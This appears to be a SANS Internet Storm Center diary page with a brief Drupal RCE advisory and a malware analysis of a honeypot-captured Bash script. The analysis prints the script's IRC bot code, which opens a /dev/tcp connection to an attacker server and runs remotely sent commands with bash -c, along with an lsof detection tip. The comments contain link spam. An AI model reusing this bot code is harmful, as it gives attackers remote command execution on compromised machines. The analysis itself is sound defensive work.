Yet Another Drupal RCE Vulnerability
Drupal today released another patch addressing a remote code execution vulnerability. According to the advisory, the vulnerability is related to the issue patched about a month ago, but this variant has not been exploited yet. Please patch ASAP!
An exploit for the vulnerability has been posted to pastebin [2] . This exploit does require authentication.
With the March update, Drupal added a global sanitation function. This approach is often difficult to implement correctly. It is very difficult to sanitize and validate data before it is clear how it is being used, in particular if this is done for an existing and complex application like Drupal. We will see how this will work for Drupal in the long run.
[1] https://www.drupal.org/sa-core-2018-004
[2] https://pastebin.com/pRM8nmwj . (leads to exploit code)
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|
Malicious Network Traffic From /bin/bash
One of our readers from Germany sent me a malicious shell script captured by our honeypot[1] running on his Raspberry. It's a simple UNIX Bash script that performs a bunch of malicious tasks:
- Kills existing crypto miner processes (classic action these days)
- Changes the password of the user 'pi' and adds an SSH key
- Changes the DNS resolver configuration and add some DNS blackholes in /etc/hosts (redirecting to 127.0.0.1)
- Creates an IRC bot
- Installs extra tools like zmap and sshpass
- Installs itself in /etc/rc.local for persistence
The script itself is not new, it was already spotted in July 2017 but it looks to be slightly modified and was uploaded recently to VT[2] (current score is 9/59). The most interesting part of the script is the ability to run a simple IRC bot in using Bash commands. No need for a high-level language. Bash has a very interesting feature for years that not many people are aware of. You can generate network flows using standard redirections. By default, a UNIX process has always the following file descriptors available: 0 (/dev/stdin), 1 (/dev/stdout) and 2 (/dev/stderr). You can use them in commands like:
$ echo "Hello world" >/dev/stderr
In the same way, Bash can use /dev/tcp or /dev/udp to generate network flow. The syntax is /dev/<proto>/>host>/>port>.
That's the feature used in the sample. Here is how to create a simple bot (the code has been beautified):
eval 'exec 3<>/dev/tcp/$ircserver/6667;'
if [[ ! "$?" -eq 0 ]] ; then
continue
fi
eval 'printf "NICK $NICK\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
continue
fi
eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
continue
fi
# Main loop
while [ true ]; do
eval "read msg_in <&3;"
if [[ ! "$?" -eq 0 ]] ; then
break
fi
if [[ "$msg_in" =~ "PING" ]] ; then
printf "PONG %s\n" "${msg_in:5}";
eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
break
fi
sleep 1
eval 'printf "JOIN #biret\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
break
fi
elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
privmsg_h=$(echo $msg_in| cut -d':' -f 3)
privmsg_data=$(echo $msg_in| cut -d':' -f 4)
privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)
hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`
if [[ "$sign" == "$hash" ]] ; then
CMD=`echo $privmsg_data | base64 -d -i`
RES=`bash -c "$CMD" | base64 -w 0`
eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
break
fi
fi
fi
done
The magic line is the first one which created a new file descriptor ('3') that will be used to read/write to the TCP session established with the IRC server on port 6667. The attacker is able to submit commands to the bot via private messages (once authenticated). The result of the command is sent back.
Be aware that not all Bash binaries have this feature enabled by default (for security reasons). If you want to use this specific feature, you can always recompile a Bash with the following directive '--enable-net-redirections'. This can be helpful in many cases. Example to grab data from a remote server without external tools:
exec 5<> /dev/tcp/blog.rootshell.be/80 printf "GET / HTTP/1.0\nHost: blog.rootshell.be\n" >&5 cat <&5 exec 5>&-
A simple way to detect this behaviour is to search for network flows generated by /bin/bash processed. Example using lsof[3]:
# lsof -i | grep bash bash 81084 xavier 5u IPv4 0x1cbc30b70d8a7879 0t0 TCP xxxxx.rootshell.be:57253->blog.rootshell.be:http (ESTABLISHED)
[1] https://isc.sans.edu/honeypot.html
[2] https://www.virustotal.com/#/file/ce53ae1c4f43f9f63b61fa1abd675cb8c0893aa3ffb50506fc401c5978318f74/detection
[3] https://www.forensicswiki.org/wiki/Lsof
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
Comments
www
Nov 17th 2022
6 months ago
EEW
Nov 17th 2022
6 months ago
qwq
Nov 17th 2022
6 months ago
mashood
Nov 17th 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
6 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
isc.sans.edu
Dec 26th 2022
5 months ago
isc.sans.edu
Dec 26th 2022
5 months ago